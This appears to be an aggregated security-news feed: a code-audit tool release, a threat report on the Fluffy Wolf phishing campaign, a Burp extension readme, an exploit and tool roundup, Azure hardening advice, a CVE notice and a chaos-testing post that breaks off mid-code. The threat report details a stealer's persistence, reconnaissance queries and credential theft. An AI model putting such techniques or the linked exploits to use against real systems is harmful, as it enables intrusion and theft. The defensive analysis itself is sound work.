
Read code like a pro with our weAudit VSCode extension

19 March 2024 at 13:30

By Filipe Casal

Today, we’re releasing weAudit, the collaborative code-reviewing tool that we use during our security audits. With weAudit, we review code more efficiently by taking notes and tracking bugs in a codebase directly inside VSCode, reducing our reliance on external tools, ensuring we never lose track of bugs we find, and enabling us to share that information with teammates.

We designed weAudit with features that are crucial to our auditing process:

  • Bookmarks for findings and notes: Bookmark code regions to identify findings or add audit notes.
  • Tracking of audited files: Mark entire files as reviewed.
  • Collaboration: View and share findings with multiple users.
  • Creation of GitHub issues: Fill in detailed information about a finding and create a preformatted GitHub issue right from weAudit.

You can install it through the VSCode marketplace and find its code in our vscode-weaudit repo.

Why we built weAudit

When we review complex codebases, we often compile detailed notes about both the high-level structure and specific low-level implementation details to share with our project team. For high-level notes, standard document sharing tools more than suffice. But those tools are not ideal for sharing low-level, code-specific notes. For those, we need a tool that allows us to share notes that are more tightly coupled with the codebase itself, almost like using post-it notes to navigate through a complex book. Specifically, we need a tool that allows us to do the following:

  • Quickly navigate through areas of interest in the codebase
  • Visually highlight significant areas of the code
  • Add audit notes to certain parts of the codebase

For some time, I used a very simple extension for VSCode called “Bookmarks”, which allowed me to add basic notes to lines of code. However, I was never satisfied with this extension, as it was missing crucial features:

  • The highlighted code did not display the notes I had written next to the code.
  • I had no way of sharing code coverage information with my client or fellow engineers auditing the codebase.
  • I had no way of sharing my notes and bookmarks. During an audit with a team of engineers, I need to be able to share these things with my team so that my knowledge is their knowledge, and vice versa.

All of us engineers at Trail of Bits agreed that we needed a better tool for this purpose. We realized that if we wanted an extension tailored to our needs, we would need to create it. That is why we built weAudit.

weAudit’s main features

The features we built into weAudit streamline our process of bookmarking, annotating, and tracking code files under audit, sharing our notes, and creating GitHub issues for findings we discover.

Bookmarks

The extension supports two types of bookmarks: findings, which represent buggy or suspicious regions of code, and notes, which represent personal annotations about the code.

You can add findings and notes to the current code snippet selection by running the corresponding VSCode commands or using the keyboard shortcuts:

  • “weAudit: New Finding from Selection” (shortcut: Cmd + J)
  • “weAudit: New Note from Selection” (shortcut: Cmd + K)

These commands will highlight the code in the editor and create a new bookmark in the “List of Findings” view in the sidebar.

By clicking on an item in the “List of Findings” view, you can navigate to the corresponding region of code.

Files with a finding will have a “!” annotation next to the file name in both the file tree of VSCode’s default “Explorer” view and in the tab above the editor, making it immediately clear which files have findings.

The highlight colors can be customized in the extension settings.

Tracking audited files

After reviewing a file, you can mark it as audited by running the “weAudit: Mark File as Reviewed” command or its keyboard shortcut, Cmd + 7. The whole file will be highlighted, and the file name in both the file tree and the tab above the editor will be annotated with a ✓.

The highlight color can be customized in the extension settings.

Daily log

Have you ever had trouble remembering which files you reviewed the previous week? Or do you just really like meaningless statistics such as the number of lines of code you read in a single day? You can see these stats by showing the daily log, accessible from the “List of Findings” panel.

You can also view the daily log by running the “weAudit: Show Daily Log” command in the command palette.

Collaboration with multiple users

You can share weAudit files (located in the .vscode folder) with your co-auditors to share findings and notes about the code. In the “weAudit Files” panel, you can toggle to show or hide the findings from each user by clicking on each entry. The colors for other users’ findings and notes and for your own findings and notes are customizable in the extension settings.

Detailed findings

You can fill in detailed information about a finding by clicking on it in the “List of Findings” view in the sidebar, where you can add all the information we include in our audit reports: title, severity, difficulty, description, exploit scenario, and recommendations for resolving the issue.

This information is then used to prefill a template, allowing you to quickly open a GitHub issue with all of the relevant details for the finding.

You can find more details and information about other features in our README.

Try it out for yourself!

If you use VSCode to navigate through large codebases, we invite you to try weAudit—even if you are not looking for bugs—and let us know what you think!

We welcome any bug reports, feature requests, and contributions in our vscode-weaudit repo.

If you’re interested in VSCode extension security, check out our “Escaping misconfigured VSCode extensions” and “Escaping well-configured VSCode extensions (for profit)” blog posts.

Contact us if you need help securing your VSCode extensions or any other application.

Fluffy Wolf sends out reconciliation reports to sneak into corporate infrastructures

By: BI.ZONE
19 March 2024 at 12:01

The group has adopted a simple yet effective approach to gain initial access: phishing emails with an executable attachment. This way, Fluffy Wolf establishes remote access, steals credentials, or exploits the compromised infrastructure for mining.

The BI.ZONE Threat Intelligence team has detected a previously unknown cluster, dubbed Fluffy Wolf, whose activity can be traced back to 2022. The group uses phishing emails with password-protected archive attachments. The archives contain executable files disguised as reconciliation reports. They are used to deliver various tools to a compromised system, such as Remote Utilities (legitimate software), Meta Stealer, WarZone RAT, or XMRig miner.

Key findings

  1. Phishing emails remain an effective method of intrusion: at least 5% of corporate employees download and open hostile attachments.
  2. Threat actors continue to experiment with legitimate remote access software to enhance their arsenal with new tools.
  3. Malware-as-a-service programs and their cracked versions are expanding the threat landscape in Russia and other CIS countries. They also enable attackers with mediocre technical skills to mount successful attacks.

The campaign

One of the latest campaigns began with the attackers sending out phishing emails, pretending to be a construction firm (fig. 1). The message titled Reports to sign had an archive with the password included in the file name.

Fig. 1. Phishing email

The archive contained a file, Akt_Sverka_1C_Doc_28112023_PDF.com, disguised as a reconciliation report; it downloaded and installed Remote Utilities (a remote access tool) and launched Meta Stealer.

When executed, the malicious file performed the following actions:

  • copied itself into the directory C:\Users\[user]\AppData\Roaming, for example, as Znruogca.exe (the name is specified in the configuration)
  • created a registry value named Znruogca, set to the path of the copied file, under HKCU\Software\Microsoft\Windows\CurrentVersion\Run so that the malware runs after a system reboot
  • launched the Remote Utilities loader that delivers the payload from the C2 server
  • started a copy of the active process and injected Meta Stealer’s payload into it
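
For defenders, this persistence mechanism is easy to audit. Below is a minimal detection sketch in Python, assuming a Windows host and using only the standard library; since the value name (Znruogca) is sample-specific, the sketch flags any Run entry pointing into AppData\Roaming, as the sample does.

```python
import winreg

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

def list_run_entries() -> dict:
    """Enumerate HKCU Run values, the location the sample uses for persistence."""
    entries = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _type = winreg.EnumValue(key, index)
            except OSError:  # no more values to enumerate
                break
            entries[name] = value
            index += 1
    return entries

if __name__ == "__main__":
    for name, path in list_run_entries().items():
        # The sample drops its copy under AppData\Roaming, so flag such entries
        if "appdata\\roaming" in path.lower():
            print(f"Suspicious Run entry: {name} -> {path}")
```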

The Remote Utilities installer is an NSIS (Nullsoft Scriptable Install System) package that copies program modules to C:\ProgramData\TouchSupport\Bin and runs the Remote Utilities executable, wuapihost.exe.

Remote Utilities is a legitimate remote access tool that enables a threat actor to gain complete control over a compromised device. Thus, they can track the user’s actions, transmit files, run commands, interact with the task scheduler, etc. (fig. 2).

Fig. 2. Remote Utilities official website

Meta Stealer is a clone of the popular RedLine stealer and is frequently used in attacks against organizations in Russia and other CIS countries. Among others, this stealer was employed by the Sticky Wolf cluster.

The stealer can be purchased on underground forums and through the official Telegram channel (fig. 3).

Fig. 3. Message in the Telegram channel

A monthly subscription to the malware costs as little as 150 dollars, while a lifetime license can be purchased for 1,000 dollars. Notably, Meta Stealer is not banned from use in the CIS countries.

The stealer allows the attackers to retrieve the following information about the system:

  • username
  • screen resolution
  • operating system version
  • operating system language
  • unique identifier (domain name + username + device serial number)
  • time zone
  • CPU (by sending a WMI request SELECT * FROM Win32_Processor)
  • graphics cards (by sending a WMI request SELECT * FROM Win32_VideoController)
  • browsers (by enumerating keys under the registry paths SOFTWARE\WOW6432Node\Clients\StartMenuInternet and SOFTWARE\Clients\StartMenuInternet)
  • software (by enumerating keys under the registry path SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall)
  • security solutions (by sending WMI requests SELECT * FROM AntivirusProduct, SELECT * FROM AntiSpyWareProduct and SELECT * FROM FirewallProduct)
  • processes running (by sending a WMI request SELECT * FROM Win32_Process Where SessionId='[running process session]')
  • keyboard layouts
  • screenshots
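
To baseline or emulate this reconnaissance defensively, the same WQL queries can be replayed through PowerShell's Get-CimInstance. A minimal sketch (only two of the queries listed above are included; extend the list as needed):

```python
import subprocess

# Two of the WQL queries the stealer issues, per the list above
WMI_QUERIES = [
    "SELECT * FROM Win32_Processor",
    "SELECT * FROM Win32_VideoController",
]

def run_wmi_query(query: str) -> str:
    """Run a WQL query via PowerShell's Get-CimInstance and return the output."""
    result = subprocess.run(
        ["powershell", "-NoProfile", "-Command",
         f'Get-CimInstance -Query "{query}" | Format-List'],
        capture_output=True, text=True, check=False,
    )
    return result.stdout

if __name__ == "__main__":
    for query in WMI_QUERIES:
        print(f"--- {query} ---")
        print(run_wmi_query(query))
```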

Then it collects and sends the following information to the C2 server:

  • files that match the mask specified in the configuration
  • credentials and cookies from Chromium and Firefox-like browsers (browser paths are specified in the configuration)
  • FileZilla data
  • cryptocurrency wallet data (specified in the configuration)
  • data from the VPN clients installed on the compromised device (NordVPN, ProtonVPN)

We were also able to link this cluster to some previous campaigns that used different sets of tools:

  • a universal loader that spreads the payloads of the Remote Utilities installer and the Meta Stealer
  • an installer with the Meta Stealer payload that downloads Remote Utilities from the C2 server
  • the Remote Utilities installer only, without Meta Stealer
  • WarZone RAT, another malware-as-a-service solution, instead of Remote Utilities
  • a loader for Remote Utilities, Meta Stealer, and WarZone RAT in a single file
  • a miner as an additional tool

Conclusions

The duration and variety of attacks conducted by clusters of activity such as Fluffy Wolf prove their effectiveness. Despite the use of fairly simple tools, the threat actors are able to achieve complex goals. This once again highlights the importance of threat intelligence. Having access to the latest data, companies can promptly detect and eliminate malicious activity at the early stages of the attack cycle.

Indicators of compromise

bussines-a[.]ru
3aaa68af37f9d0ba1bc4b0d505b23f10a994f7cfd9fdf6a5d294c7ef5b4c6a6a
794d27b8f218473d51caa9cfdada493bc260ec8db3b95c43fb1a8ffbf4b4aaf7

MITRE ATT&CK

More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.

How to protect your company from such threats

Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.

To stay ahead of threat actors, you need to be aware of the methods used in attacks against different infrastructures and to understand the threat landscape. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence platform. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect against the most critical threats to the company.

GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

By: Zion3R
19 March 2024 at 11:30

This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


TL;DR

Installation

  1. Visit the Jython official site and download the latest standalone JAR file, e.g. jython-standalone-2.7.3.jar.
  2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
  3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
  4. Download the GAP.py and requirements.txt from this project and place in the same directory.
  5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
  6. Go to Extensions -> Installed and click Add under Burp Extensions.
  7. Set the Extension type to Python and select the GAP.py file.

Using

  1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

Or you can right-click a request or response in any other context and select GAP from the Extensions menu.

  2. Then go to the GAP tab to see the results:

IMPORTANT Notes

If you don't need one of the modes, un-check it; the results will come back quicker.

If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run it for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.

If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

In Depth Instructions

Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

TODO

  • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
  • Add an option to not add the Tentative Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
  • Improve performance of the link finding regular expressions.
  • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
  • Deal with other size displays and font sizes better to make sure all controls are viewable.
  • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
  • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

🤘 /XNL-h4ck3r



Identity Providers for RedTeamers

18 March 2024 at 23:01
Originally presented at SOCON-2024 and continuing the series on post-exploitation techniques against Identity Providers, this blog post looks at Ping, OneLogin, and Entra ID. I'll discuss how post-exploitation techniques effective against Okta apply to other providers, release new tools for post-exploitation, and look at what proves effective when critical assets lie beyond an Identity Provider portal.


Last Week in Security (LWiS) - 2024-03-18

By: Erik
19 March 2024 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-03-11 to 2024-03-18.

News

Techniques and Write-ups

Tools and Exploits

  • BlueSpy - Proof of concept to record and replay audio from a bluetooth device without the legitimate user's awareness.
  • Introducing AzurEnum - The latest Azure tool - Intended to give pentesters/red teamers a good idea of the main security issues of an Azure tenant and its permission structure. The code is here.
  • Gungnir - Gungnir is a command-line tool written in Go that continuously monitors certificate transparency (CT) logs for newly issued SSL/TLS certificates.
  • SymProcAddress - Zero EAT touch way to retrieve function addresses (GetProcAddress on steroids)
  • anfs - Asynchronous NFSv3 client in pure Python
  • Pixel_GPU_Exploit - Android 14 kernel exploit for Pixel7/8 Pro.
  • GamingServiceEoP - Exploit for an arbitrary folder move in the GamingService component of Xbox. GamingService is not a default service; if it is installed on the system, it allows low-privileged users to escalate to SYSTEM.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • Mythic Community Overview - Mythic agent capability matrix. Cool project for those that develop their own agents for Mythic.
  • localsend - An open-source cross-platform alternative to AirDrop
  • FindMeAccess - Finding gaps in Azure/M365 MFA requirements for different resources, client ids, and user agents. The tool is mostly based off Spray365's auditing logic.
  • PurpleLab - PurpleLab is an efficient and readily deployable lab solution, providing a swift setup for cybersecurity professionals to test detection rules, simulate logs, and undertake various security tasks, all accessible through a user-friendly web interface
  • DetectDee - Hunt down social media accounts by username, email or phone across social networks.
  • Moriarty - Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments.
  • Miaow - Project Miaow is a proof of concept to escalate privileges in Microsoft Azure using an ARM template deployment
  • Payload Wizard - AI assistant that utilizes GPT language models to interpret and generate cybersecurity payloads 🪄. Github repo is here.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

5 Best Practices to Secure Azure Resources

18 March 2024 at 14:15

Cloud computing has become the backbone for modern businesses due to its scalability, flexibility and cost-efficiency. As organizations choose cloud service providers to power their technological transformations, they must also properly secure their cloud environments to protect sensitive data, maintain privacy and comply with stringent regulatory requirements. 

Today’s organizations face the complex challenge of outpacing cloud-based threats. Adversaries continue to set their sights on the expansive surface of cloud environments, as evidenced by the 75% increase in cloud intrusions in 2023 recorded in the CrowdStrike 2024 Global Threat Report. This growth in adversary activity highlights the need for organizations to understand how to protect their cloud environment and workloads. 

In light of the frequent breaches of Microsoft’s infrastructure, organizations using Microsoft Azure should take proactive steps to mitigate potential risk. Microsoft’s solutions can be complex, difficult to maintain and configure, and prone to vulnerabilities. It’s the responsibility of organizations using Azure to ensure their cloud environments are properly configured and protected. 

This blog outlines best practices for securing Azure resources to ensure that your cloud infrastructure is fortified against emerging and increasingly sophisticated cyber threats.

Best Practice #1: Require Multifactor Authentication (MFA) and Restrict Access to Source IP Addresses for Both Console and CLI Access

In traditional IT architecture, the security perimeter was clearly defined by the presence of physical network firewalls and endpoint protections, which served as the first line of defense against unauthorized access. In cloud-based environments, this traditional architecture has evolved to include identity, which encompasses user credentials and access management.

This shift amplifies the risk of brute-force attacks or the compromise of user credentials. Particularly in Microsoft environments, the complexity of the identity security framework and inability to consistently apply conditional access policies across the customer estate introduce additional risk. Navigating Microsoft’s security solutions can be daunting, with multiple agents to manage and an array of licenses offering varying levels of protection. The lack of real-time protection and inability to trigger MFA directly through a domain controller further amplify risk. 

Adversaries who manage to procure valid credentials, especially by taking advantage of weak identity security practices, can masquerade as legitimate users. This unauthorized access becomes even more dangerous if the compromised account has elevated privileges. Adversaries can use these accounts to establish persistence and perform data exfiltration, intellectual property theft or other malicious activity that can have devastating impacts on an organization’s operations, reputation and bottom line.

To avoid this, organizations should:

  • Use conditional access: Implement conditional access policies and designate trusted locations.
  • Require MFA: Enforce rules for session times, establish strong password policies and mandate periodic password changes.
  • Monitor MFA connections: Verify that MFA connections originate from a trusted source or IP range. For services that cannot utilize managed identities for Azure resources and must rely on static API keys, a critical best practice is to restrict usage to safe IP addresses when MFA is not an option. However, it’s crucial to understand that broadly trusting IPs from your data centers and offices does not constitute a safe practice. Despite the network location, MFA should always be mandated for all human users to ensure maximum security.
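
As an illustration, such a policy can be provisioned through the Microsoft Graph API. The sketch below is a minimal example and not vendor reference code; token acquisition is out of scope, and the excluded break-glass account ID is a placeholder.

```python
import requests

GRAPH = "https://graph.microsoft.com/v1.0"
TOKEN = "<access-token>"  # assumes Policy.ReadWrite.ConditionalAccess permission

# Conditional Access policy requiring MFA for all users, deployed in
# report-only mode first so its impact can be reviewed before enforcement
policy = {
    "displayName": "Require MFA for all users",
    "state": "enabledForReportingButNotEnforced",
    "conditions": {
        "users": {
            "includeUsers": ["All"],
            # Always exclude emergency / break-glass accounts
            "excludeUsers": ["<break-glass-account-object-id>"],
        },
        "applications": {"includeApplications": ["All"]},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
}

resp = requests.post(
    f"{GRAPH}/identity/conditionalAccess/policies",
    headers={"Authorization": f"Bearer {TOKEN}"},
    json=policy,
)
resp.raise_for_status()
print(resp.json()["id"])
```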

Best Practice #2: Use Caution When Provisioning Elevated Privileges

Privileged accounts have elevated permissions, allowing them to perform tasks or operations that a standard user would not be able to perform. These may include accessing sensitive resources or making critical changes to a system or network. Accounts provisioned with more privileges than needed are appealing to adversaries, driving both the likelihood of compromise and the risk of damage. 

Adversaries often target privileged Azure identities to establish persistence, move laterally and steal data. While high privileges are necessary for IT and systems administrators to accomplish routine tasks, weak security policies on account provisioning can dramatically overexpose an organization to risk. These privileges should be tightly controlled and monitored, and only provisioned when strictly necessary after a security process has been defined and implemented. 

Service accounts add to these challenges. Their limitations represent a troublesome area for Microsoft — for example, the difficulty in discovering and tracking Active Directory-based service accounts and poor visibility into these accounts’ behavior. CrowdStrike automatically differentiates between service accounts and human users to deliver the most appropriate configurations and responses. Further, Microsoft Defender for Identity lacks pre-built detections designed for service accounts — such as identifying stale service accounts or detecting interactive logins by stale accounts — something CrowdStrike customers can easily address. 

To help prevent adversaries’ abuse of privileged accounts, organizations should:

  • Reduce the quantity of privileged users: Only grant privileged role assignments to a limited number of users. Overprovisioning is common and is often done by default by the application.
  • Follow the principle of least privilege: Individuals should only be granted the minimum permissions necessary to perform their required tasks. Regular reviews should be scheduled with a view to downgrading privileges where the need no longer exists.
  • Control access: Restrict cloud access to only trusted IP addresses and services that are genuinely required.
  • Ensure that privileged accounts are cloud-only: Azure privileged accounts should be cloud-only (not synced to a domain), they should require MFA and they should not be used for daily tasks such as email or web browsing.
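
A quick way to spot overprovisioning is to enumerate activated directory roles and their member counts through Microsoft Graph. A minimal sketch, assuming an access token with a suitable read permission (for example, RoleManagement.Read.Directory):

```python
import requests

GRAPH = "https://graph.microsoft.com/v1.0"
TOKEN = "<access-token>"  # placeholder; acquire via your usual auth flow
headers = {"Authorization": f"Bearer {TOKEN}"}

# /directoryRoles returns only roles that have been activated in the tenant
# (pagination is omitted for brevity)
roles = requests.get(f"{GRAPH}/directoryRoles", headers=headers).json()["value"]
for role in roles:
    members = requests.get(
        f"{GRAPH}/directoryRoles/{role['id']}/members", headers=headers
    ).json()["value"]
    print(f"{role['displayName']}: {len(members)} member(s)")
```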

Best Practice #3: Utilize Key Vaults or a Secrets Management Solution to Store Sensitive Credentials

A surprising amount of digital information is unintentionally stored in public-facing locations that can be accessed by adversaries and then weaponized against an organization. Public code repositories, version control systems or other repositories used by developers can have a high risk of exposing live access keys, which authenticate a trusted user into a cloud service. Exposed access keys allow adversaries to pose as legitimate users and bypass authentication mechanisms into cloud services. 

Adversaries can use access keys, along with metadata and formatting clues, to identify specifics about an environment. Exposed access keys can also be acquired from code snippets, copied from a repository where they are exposed or pulled from compromised systems or logs. Private source code repositories can be compromised, leading to theft of these API keys.

Stolen credentials, whether they’re console usernames and passwords or API key IDs and secret IDs, play an essential role in many incidents. This is evident in the latest Microsoft breach, in which Russian state actors stole cryptographic secrets such as passwords, certificates and authentication keys. This incident raises a significant concern: If Microsoft, using its own technology and expertise in the environment it owns, struggles to remain secure, how can Microsoft customers confidently protect their own assets? 

To protect against this, security teams should ask themselves:

  • Where do we store access keys?
  • Where are our access keys embedded?
  • How often do we rotate our access keys? 

Having a dedicated secrets management solution to protect and enforce granular access to specific secrets makes it difficult for an adversary or insider threat to steal credentials.
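
With Azure Key Vault, for example, application code can fetch secrets at runtime instead of embedding them. A minimal sketch using the azure-identity and azure-keyvault-secrets packages; the vault and secret names are placeholders:

```python
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient

# DefaultAzureCredential resolves a managed identity, environment variables,
# or a developer login, so no static key ever lives in the code or repo
vault_url = "https://<your-vault-name>.vault.azure.net"
client = SecretClient(vault_url=vault_url, credential=DefaultAzureCredential())

secret = client.get_secret("db-connection-string")  # placeholder secret name
print(secret.name)  # never log secret.value in real code
```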

Important note: Proceed with extreme caution when tying administrative or highly privileged access to key vaults to SSO. If your SSO is subverted through weak MFA management, all of your credentials could be instantly stolen by a threat actor impersonating an existing or newly privileged user. Hardware tokens and strong credential reset management are a must for these applications.

Best Practice #4: Don’t Allow Unrestricted Outbound Access to the Internet

One of the most common cloud misconfigurations we see is unrestricted outbound access. This allows for unrestricted communications from internal assets, opening the door for outbound adversary communications and data exfiltration.

Also described as free network egress, unrestricted outbound access is a misconfiguration in which Azure cloud resources like containers, hosts and functions are allowed to communicate externally to any server on the internet with limited controls or oversight. This can be a default misconfiguration, and security teams often have to collaborate with IT or DevOps teams to address it. Because developers or system owners don’t always have full knowledge of the various external services that a workload might depend on — and because they might be accustomed to having unrestricted outbound access in their other work environments — some organizations battle with trying to close this loophole.

Adversaries can exploit this wherever untrusted data is processed by a workload. For example, an adversary may attempt to compromise the underlying software processing web requests, queued messages or uploaded files using remote code execution. This is then followed by payload retrieval or establishing a reverse shell. If outbound access is not permitted, they cannot retrieve the payload and attacks cannot be completed. However, once an initial code execution attack is successful, the adversary has full execution control in the environment.

To address this, organizations can:

  • Configure rules and settings: Define cloud rules to securely control and filter outbound traffic, with provisioned security groups serving as an additional layer of protection.
  • Apply the principle of least privilege: Grant outbound access only to resources or services where it is explicitly required.
  • Control access: Limit cloud access exclusively to trusted IP addresses and services that are genuinely necessary.
  • Add security through a proxy layer: Utilize proxy server tiers to introduce an additional layer of security and depth.
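
As a starting point, a low-priority deny-all rule for Internet-bound traffic can be appended to a network security group so that only explicitly allowed destinations remain reachable. A minimal sketch using the azure-mgmt-network package; all resource names are placeholders:

```python
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient

client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")

# Priority 4000 is evaluated last, so lower-numbered allow rules take precedence
deny_outbound = {
    "protocol": "*",
    "source_address_prefix": "*",
    "source_port_range": "*",
    "destination_address_prefix": "Internet",
    "destination_port_range": "*",
    "access": "Deny",
    "direction": "Outbound",
    "priority": 4000,
}

client.security_rules.begin_create_or_update(
    "<resource-group>", "<nsg-name>", "deny-all-outbound", deny_outbound
).result()
```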

Best Practice #5: Scan Continuously for Shadow IT Resources

It is common for organizations to have IT assets and processes running in Azure tenants that the security teams do not know about. There have been incidents in which threat actors have compromised Azure resources that were unauthorized or were supposed to have been decommissioned. Both nation-state and eCrime adversaries thrive in these environments, where logging and visibility are typically poor and audit/change control is often nonexistent.

Some recommendations to address shadow IT resources include:

  • Implement continuous scanning: Deploy tools and processes to continuously scan for unauthorized or unknown IT resources within Azure environments, ensuring all assets are accounted for and monitored.
  • Establish robust asset management: Adopt a comprehensive cloud asset management solution that can identify, track and manage all IT assets to prevent unauthorized access and use, enhancing overall security posture. This includes Azure enterprise applications and service principals along with their associated privileges and credentials. 
  • Enhance incident response: Strengthen incident response strategies by integrating asset management insights, enabling quick identification and remediation of compromised or rogue assets. These may include unauthorized virtual machines used for activities like crypto mining and enterprise apps and service principals used or repurposed to exfiltrate databases, file shares and internal documentation and email.
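
One practical building block for continuous scanning is Azure Resource Graph, which can inventory every resource across subscriptions so the results can be diffed against your asset register. A minimal sketch using the azure-mgmt-resourcegraph package; the subscription ID is a placeholder:

```python
from azure.identity import DefaultAzureCredential
from azure.mgmt.resourcegraph import ResourceGraphClient
from azure.mgmt.resourcegraph.models import QueryRequest

client = ResourceGraphClient(DefaultAzureCredential())

# Summarize every resource type so unexpected assets stand out
request = QueryRequest(
    subscriptions=["<subscription-id>"],
    query="Resources | summarize count() by type | order by count_ desc",
)
response = client.resources(request)
for row in response.data:
    print(row)
```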

CrowdStrike Falcon Cloud Security 

CrowdStrike Falcon® Cloud Security empowers customers to meticulously assess their security posture and compliance across Azure and other cloud platforms, applications and workloads. It delivers effective protection against cloud-based threats, addresses potential misconfigurations and ensures adherence to compliance. These capabilities allow organizations to maintain an integrated, comprehensive overview of all cloud services and their compliance status, pinpointing instances of excessive permissions while proactively detecting and automating the remediation of indicators of attack (IOAs) and cloud misconfigurations. 

This strategic approach not only enhances the security framework but enables developers and security teams to deploy applications in the cloud with increased confidence, speed and efficiency, underscoring CrowdStrike’s commitment to bolstering cloud security and facilitating a safer, more secure digital transformation for businesses leveraging cloud infrastructure.

Evaluate your cloud security posture with a free Cloud Security Risk Review. During the review, you will engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment and identify misconfigurations, vulnerabilities and potential cloud threats. 

Additional Resources

CVE-2024-0860

18 March 2024 at 11:25

CWE-319: CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION

The affected product transmits sensitive information in cleartext, which may allow an attacker to capture packets and craft their own requests.

Softing edgeConnector: Version 3.60 and Softing edgeAggregator: Version 3.60 are affected. Update Softing edgeConnector and edgeAggregator to v3.70 or greater.

Releasing the Attacknet: A new tool for finding bugs in blockchain nodes using chaos testing

18 March 2024 at 13:00

By Benjamin Samuels (@thebensams)

Today, Trail of Bits is publishing Attacknet, a new tool that addresses the limitations of traditional runtime verification tools, built in collaboration with the Ethereum Foundation. Attacknet is intended to augment the EF’s current test methods by subjecting their execution and consensus clients to some of the most challenging network conditions imaginable.

Blockchain nodes must be held to the highest level of security assurance possible. Historically, the primary tools used to achieve this goal have been exhaustive specification, tests, client diversity, manual audits, and testnets. While these tools have traditionally done their job well, they collectively have serious limitations that can lead to critical bugs manifesting in a production environment, such as the May 2023 finality incident that occurred on Ethereum mainnet. Attacknet addresses these limitations by subjecting devnets to a much wider range of network conditions and misconfigurations than is possible on a conventional testnet.

How Attacknet works

Attacknet uses chaos engineering, a testing methodology that proactively injects faults into a production environment to verify that the system is tolerant to certain failures. These faults reproduce real-world problem scenarios and misconfigurations, and can be used to create exaggerated scenarios to test the boundary conditions of the blockchain.

Attacknet uses Chaos Mesh to inject faults into a devnet environment generated by Kurtosis. By building on top of Kurtosis and Chaos Mesh, Attacknet can create various network topologies with ensembles of different kinds of faults to push a blockchain network to its most extreme edge cases.

Some of the faults include:

  • Clock skew, where a node’s clock is skewed forwards or backwards for a specific duration. Trail of Bits was able to reproduce the Ethereum finality incident using a clock skew fault, as detailed in our TrustX talk last year.
  • Network latency, where a node’s connection to the network (or its corresponding EL/CL client) is delayed by a certain amount of time. This fault can help reproduce global latency conditions or help detect unintentional synchronicity assumptions in the blockchain’s consensus.
  • Network partition, where the network is split into two or more halves that cannot communicate with each other. This fault can test the network’s fork choice rule, ability to re-org, and other edge cases.
  • Network packet drop/corruption, where gossip packets are dropped or have their contents corrupted by a certain amount. This fault can test a node’s gossip validation and test the robustness of the network under hostile network conditions.
  • Forced node crashes/offlining, where a certain client or type of client is ungracefully shut down. This fault can test the network’s resilience to validator inactivity, and test the ability of clients to re-sync to the network.
  • I/O disk faults/latency, where a certain amount of latency or error rate is applied to all I/O operations a node makes. This fault can help profile nodes to understand their resource requirements, as I/O is often the largest limiting factor of node performance.
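
For a flavor of what one of these faults looks like in practice, the sketch below submits a Chaos Mesh TimeChaos resource (the clock-skew fault) through the Kubernetes Python client. The namespace, label selector, and offset are illustrative assumptions, not Attacknet's actual configuration format.

```python
from kubernetes import client, config

# A clock-skew fault targeting one consensus-client pod in a "devnet"
# namespace; all names and values here are illustrative
time_chaos = {
    "apiVersion": "chaos-mesh.org/v1alpha1",
    "kind": "TimeChaos",
    "metadata": {"name": "cl-clock-skew", "namespace": "devnet"},
    "spec": {
        "mode": "one",
        "selector": {"labelSelectors": {"app": "consensus-client"}},
        "timeOffset": "-5m",  # skew the node's clock five minutes backwards
        "duration": "10m",
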